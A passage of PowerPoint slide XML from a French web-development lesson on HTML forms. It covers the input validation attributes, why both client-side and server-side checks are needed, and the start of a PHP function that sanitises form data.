                        <a:t>Permet de spécifier le nombre de caractères dans un champ</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3806703690"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>minlength</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Permet de spécifier le nombre minimum de caractères dans un champ</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2932077359"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>maxlength</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Permet de spécifier le nombre maximum de caractères dans un champ</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2453385320"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>min</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r-FR" dirty="0"/>
                        <a:t>Permet de spécifier une valeur minimale pour un champ de type </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>number</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t> ou date</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="474921973"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>max</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r-FR" dirty="0"/>
                        <a:t>Permet de spécifier une valeur maximale pour un champ de type </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>number</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t> ou date</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4236214645"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>autocomplete</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Permet d’activer l’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>autocomplétion</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t> pour un champ : si un utilisateur a déjà rempli un formulaire, des valeurs lui seront proposées automatiquement lorsqu’il va commencer à remplir le champ</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3899491772"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>required</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Permet de forcer le remplissage d’un champ. Le formulaire ne pourra pas être envoyé si le champ est vide</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1232467545"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>pattern</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Permet de préciser une expression régulière. La valeur du champ devra respecter la contrainte de la regex pour être valide</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="370929511"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38428087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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="555170"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les formulaires</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Utilisation des attributs HTML pour sécuriser les formulaires">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA51D613-ECB3-4AED-8A94-8C99787C3C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12" y="1832867"/>
            <a:ext cx="10848333" cy="43393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61201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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les formulaires</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{196358FD-06DD-4632-AD4C-7F9FD36940F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696980" y="2170871"/>
            <a:ext cx="10798039" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="52000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Contre les utilisateurs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malveillants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, nous allons devoir vérifier les données après l’envoi du formulaire et neutraliser les données potentiellement dangereuses. Cette vérification se fait côté serveur.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FD56A32-3A30-407F-963B-8F01E404F12A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="3828856"/>
            <a:ext cx="4876799" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="68000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>N’u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tiliser qu’une validation dans le navigateur laisse de sérieuses failles de sécurité dans le formulaire puisque les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>utilisateurs malveillants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>peuvent désactiver ces vérifications.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E628656C-742B-4C25-B840-40400E4702A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6444932" y="3828856"/>
            <a:ext cx="4736875" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="67000"/>
            </a:srgbClr>
          </a:solid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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>N’effectuer qu’une série de vérifications côté serveur, serait une très mauvaise idée d’un point de vue expérience utilisateur puisque ces vérifications sont effectuées une fois le formulaire envoyé.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12671020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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="293914"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les formulaires</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B036655-51C5-4857-88E5-A9BB1BB2A078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="1797784"/>
            <a:ext cx="3992292" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Utilisation des fonctions de traitement de chaines de caractères en vue du filtrage et de la validation des données d’un formulaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>côté</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> serveur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C555F3D-5BEC-4E3B-9F38-45010D5106E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5700543" y="1302034"/>
            <a:ext cx="5969337" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="50FA7B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>valid_donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>trim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stripslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>donnees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
